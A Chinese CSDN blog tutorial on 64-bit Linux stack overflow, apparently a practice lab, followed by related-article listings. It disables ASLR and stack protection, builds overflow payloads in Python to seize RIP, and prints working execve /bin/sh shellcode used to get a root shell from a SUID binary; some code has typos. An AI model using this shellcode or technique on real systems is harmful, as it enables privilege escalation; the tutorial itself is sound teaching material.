linux 64位溢出

最新推荐文章于 2023-04-21 10:45:12 发布
最新推荐文章于 2023-04-21 10:45:12 发布
阅读量764 收藏
点赞数
分类专栏: 练手 文章标签: linux 64位
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ruins44/article/details/51534831
版权 
/*gcc -fno-stack-protetor -z execstack stack.c -o stack*/
/*echo 0 > /proc/sys/kernel/randomize_va_space*/
#include <stdio.h>
#include <unisted.h>
int vuln(){
    char buf[80];
    int r;
    r = read(0,buf,400);
    printf("\nRead %d bytes.buf is %s\n",r,buf);
    puts("No shell for you:(");
    return 0;
}
int main(int argc,char *argv[])
{
    printf("Try to exec /bin/sh");
    vuln();
    return 0;
}

按照注释进行编译,并且关闭ASLR。
当read()将400字节复制到一个80字节的buffer时,显然在vuln()中存在缓冲区溢出弱点。
构造exploit:

#!/usr/bin/env python
from struct import *
buf = ""
buf +="A"*400
f = open("in.txt","w")
f.write(buf)

这个脚本将创建一个命名为“in.txt”的文件(含有400个字节),将例子加载进gdb并将in.txt的内容重定向到例子中,同时我们可以看看事都可以覆盖到RIP:

Starting program: /root/stackoverflow < in1.txt
Try to exec /bin/sh
Read 400 bytes.buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
No shell for you:(

Program received signal SIGSEGV, Segmentation fault.
[———————————-registers———————————–]
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7b0ce50 (<__write_nocancel+7>: cmp rax,0xfffffffffffff001)
RDX: 0x7ffff7dd87a0 –> 0x0
RSI: 0x7ffff7ff5000 (“No shell for you:(\nis “, ‘A’ , “\220\001\n”)
RDI: 0x0
RBP: 0x4141414141414141 (‘AAAAAAAA’)
RSP: 0x7fffffffe1e8 (‘A’ …)
RIP: 0x4005df (

#!/usr/bin/env python
from struct import *
buf=""
buf+="A"*104
buf+=pack("<Q",0x42424242)
buf+="C"*290
f=open("in.txt","w")
f.write(buf)

执行上述脚本,将in.txt中的内容进行修改,然后运行gdb。
这里写图片描述
如图所示,我们可以看到RIP已经被我们所控制。
因为没有NX和ASLP等保护机制,所以可以直接将shellcode写到栈上。然后将返回地址指向栈上的shellcode即可。

/*
 * Execute /bin/sh - 27 bytes
 * Dad` <3 baboon
;rdi            0x4005c4 0x4005c4
;rsi            0x7fffffffdf40   0x7fffffffdf40
;rdx            0x0      0x0
;gdb$ x/s $rdi
;0x4005c4:        "/bin/sh"
;gdb$ x/s $rsi
;0x7fffffffdf40:  "\304\005@"
;gdb$ x/32xb $rsi
;0x7fffffffdf40: 0xc4    0x05    0x40    0x00    0x00    0x00    0x00    0x00
;0x7fffffffdf48: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
;0x7fffffffdf50: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
;0x7fffffffdf58: 0x55    0xb4    0xa5    0xf7    0xff    0x7f    0x00    0x00
;
;=> 0x7ffff7aeff20 <execve>:     mov    eax,0x3b
;   0x7ffff7aeff25 <execve+5>:   syscall 
;

main:
    ;mov rbx, 0x68732f6e69622f2f
    ;mov rbx, 0x68732f6e69622fff
    ;shr rbx, 0x8
    ;mov rax, 0xdeadbeefcafe1dea
    ;mov rbx, 0xdeadbeefcafe1dea
    ;mov rcx, 0xdeadbeefcafe1dea
    ;mov rdx, 0xdeadbeefcafe1dea
    xor eax, eax
    mov rbx, 0xFF978CD091969DD1
    neg rbx
    push rbx
    ;mov rdi, rsp
    push rsp
    pop rdi
    cdq
    push rdx
    push rdi
    ;mov rsi, rsp
    push rsp
    pop rsi
    mov al, 0x3b
    syscall
 */

#include <stdio.h>
#include <string.h>

char code[] = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";

int main()
{
    printf("len:%d bytes\n", strlen(code));
    (*(void(*)()) code)();
    return 0;
}

通过一个环境变量PWN来获取shellcode在栈上的地址:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc,char *argv[])
{
    char *ptr;
        if(argc<3)
        {
            printf("Usage:%s<environment var><target program name>\n",argv[0]);
            exit(0);
        }
        ptr = getenv(argv[1]);
        ptr += (strlen(argv[0])-strlen(argv[2]))*2
        printf("%s will be at %p\n",argv[1],ptr);
        return 0;
}

这里写图片描述

可以看到shellcode在栈上的地址为0x7fffffffedd3
下面我们就修改脚本

#!/usr/bin/env python
from struct import *
buf=""
buf+="A"*104
buf+=pack("<Q",0x7fffffffedd3)
f=open("in.txt","w")
f.write(buf)

这里写图片描述
确保改变我们的所有权并将例子权限改成SUID(root),因此可以得到我们的root shell。
这里写图片描述
执行完脚本之后,更新in.txt,并将payload送进例子中,就可以返回shell了。

ruins44
关注
专栏目录
linux x86_64 缓冲区溢出分析 以及 shellcode简介
shuimuyq的专栏
01-15 1866
/* buger.c */ #include #include #include int main(void) { char buffer[128] = {0}; char *envp = NULL; printf("buffer address is: %p\n", &buffer); envp = getenv("KIRIKA"); if (envp) strcpy
linux 64位溢出,栈溢出64位程序的处理方法
weixin_39717865的博客
05-13 1412
在做 pwn 题时,难免会遇到64位的栈溢出程序,处理32位和64位程序会有所不同。这里总结一下64位和32位程序的差异,并结合两道例题给出解题方法0x00 差异1.64 位函数调用需要使用寄存器传参,前三个参数存放在寄存器 rdi、rsi、rdx 中,32 位函数调用使用栈传参(具体看下面的例子)2.64程序一个存储单元占8个字节,32位占4个字节。所以在填充 ebp(rbp) 时会有差异,这是...
64位Linux下的栈溢出
omnispace的博客
03-29 5603
from:http://packetstormsecurity.com/files/download/127007/64bit-overflow.pdf 本文的目的是让大家学到64位缓冲区溢出的基础知识。 作者Mr.Un1k0d3r RingZer0 Team 摘要 0x01 x86和x86_64的区别 0x02 漏洞代码片段 0x03 触发溢出 0x04 控制RIP 0x05 跳入用户
linux64 溢出,64位Linux下的栈溢出
weixin_36383252的博客
05-12 458
from:http://packetstormsecurity.com/files/download/127007/64bit-overflow.pdf本文的目的是让大家学到64位缓冲区溢出的基础知识。 作者Mr.Un1k0d3rRingZer0Team摘要0x01x86和x86_64的区别0x02漏洞代码片段0x03触发溢出0x04控制RIP0x05跳入用户控制的缓冲区0x06执...
64位系统的缓冲区溢出攻击实例
weixin_42582241的博客
12-10 1360
实验准备 Ubuntu 64位 实验:homework.exe homework12linux64bit.exe 在在64位Linux系统的运行结果: 可观察出其存在缓冲区溢出。 利用dbg对其进行调试: 用gdb装入可执行文件之后,立即反汇编main和foo函数: 此时的代码地址为静态地址(可执行文件中的代码地址)。 进程启动之后,反汇编main和foo函数: 在3个关键地址设置断点: 函数foo入口点的64位栈寄存器rsp保存了返回地址的指针(0x7fffffffde98),栈的内容为0x00005
X64 缓冲区溢出
weixin_41487541的博客
09-07 432
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 本篇旨在通过简单的例子来学习32位栈利用,随手记。 一、函数栈帧 每一个函数独占自己的栈帧空间。当前正在运行的函数栈帧总是在栈顶。Win32 系统提供两个特殊的寄存器用于表示位于系统栈顶端的栈帧:ESP(栈指针寄存器)和EBP(基址指针寄存器)。 在函数栈帧中,一般包括以下几...
linux 64位 内存泄漏,64位linux系统:栈溢出+ret2libc ROP attack
weixin_34185033的博客
05-01 686
一.实验要求栈溢出+ ret2libc ROP 操作系统:Ubuntu 16.04 64bit 安全机制:不可执行位保护,ASLR(内存地址随机化)打开安全机制,确保×××能绕过以上安全机制,利用漏洞完成attack,实现基本目标:调用system(“/bin/sh”),打开shell。二.实验概述ret2libc(return-into-libc)是一种利用缓冲区溢出的代码复用技术,...
linux 64位溢出分析
小强的博客
08-01 2498
调试环境是ubuntu16 64位 这次开启了DEP、ASLR(知道libc.so情况下) 还是参考了《一步一步学ROP之linux_x64篇》这篇文章。 代码是1.c: #include #include #include void vulnerable_function() { char buf[128]; read(STDIN_FILENO, bu
X86_64架构下的LINUX缓冲区溢出栈分析
For free
11-17 1819
缓冲区溢出基础: #include #include int main(int argc, char *argv[]) { char str[10]; strcpy(str, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"); return 0; } 这里strcpy的时候,字符长度超出了str所允许的长度,发生了溢出。当我们运行这个代码的时候,程序
linux64 溢出,linux 64位驻留缓冲区溢出
weixin_42318225的博客
05-12 129
我正在研究一些与安全有关的事情,现在我正在玩我自己的堆栈.我正在做的事应该非常简单,我甚至都没有尝试执行堆栈,只是为了表明我可以控制64位系统上的指令指针.我已经关闭了所有我能够使用它的保护机制(NX-bit,ASLR,也用-fno-stack-protector -z execstack编译).我没有那么多64位汇编的经验,花了一些时间搜索和试验自己后,我想知道是否有人可以解释我正在经历的问题....
记一次Windows 64位缓冲区溢出
weixin_41487541的博客
10-14 602
以下为原文链接,但是我在复现时出了些问题;在实现方面也与原文有所不同。 https://www.coalfire.com/the-coalfire-blog/september-2020/the-basics-of-exploit-development-5-x86-64-buffer 环境 Win10 18363 + x64dbg; 原文中还使用了x64dbg的ERC插件,但是通过观察栈帧、计算偏移也可以实现。 以下为溢出样本代码。 #include <iostream> #
【计算机系统】缓冲区溢出攻击实验
热门推荐
Alex_SCY的博客
07-28 1万+
github地址 一、 实验目标: 理解程序函数调用中参数传递机制; 掌握缓冲区溢出攻击方法; 进一步熟练掌握GDB调试工具和objdump反汇编工具。 二、实验环境: 计算机(Intel CPU) Linux 64位操作系统 GDB调试工具 objdump反汇编工具 三、实验内容 本实验设计为一个黑客利用缓冲区溢出技术进行攻击的游戏。我们仅给黑客(同学)提供一个二进制可执行文件bufbomb和部分函数的C代码,不提供每个关卡的源代码。程序运行中有3个关卡,每个关卡需要用户输入正确的缓冲区内容,.
GCC编译选项参数
ken2232的博客
03-09 3401
linux系统下头文件、库文件搜索路径
网络安全——缓冲区溢出攻击
最新发布
VN520的博客
04-21 6602
什么是缓冲区?它是指程序运行期间,在内存中分配的一个连续的区域,用于保存包括字符数组在内的各种数据类型。所谓溢出,其实就是所填充的数据超出了原有的缓冲区边界,并非法占据了另一段内存区域。两者结合进来,所谓缓冲区溢出,就是由于填充数据越界而导致原有流程的改变,黑客借此精心构造填充数据,让程序转而执行特殊的代码,最终获取控制权。
linux系统调用实现机制详解(内核4.14.4)
weixin_34101229的博客
03-09 403
linux系统调用实现机制详解(内核4.14.4)前言 1.1 linux系统调用介绍 linux内核中设置了一组用于实现系统功能的子程序,称为系统调用。和普通库函数调用相似,只是系统调用由操作系统核心提供,运行于核心态,而普通的函数调用由函数库或用户自己提供,运行于用户态。 在Linux中,每个系统调用被赋予一个系统调用号。通过这个独一无二...
【读薄 CSAPP】伍 异常控制流
xbean1028的博客
02-19 368
【读薄 CSAPP】伍 异常控制流 文章目录【读薄 CSAPP】伍 异常控制流学习目标异常控制流异常 Exception异步异常(中断)同步异常系统调用示例故障示例进程进程切换 Process Context Switch进程控制 Process Control进程图回收子进程信号 Signal进程组接收信号阻塞信号安全处理信号非本地跳转 Non local Jump总结参考链接特别致谢 学习目标...
64位Linux下栈溢出原理与利用示例
本文主要探讨了在64位Linux系统环境下发生的栈溢出攻击,由作者Mr.Un1k0d3rRingZer0Team撰写,旨在帮助读者理解64位系统下栈溢出攻击的基本原理和技术细节。文章首先解释了x86和x86_64架构之间的关键区别,重点提到...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值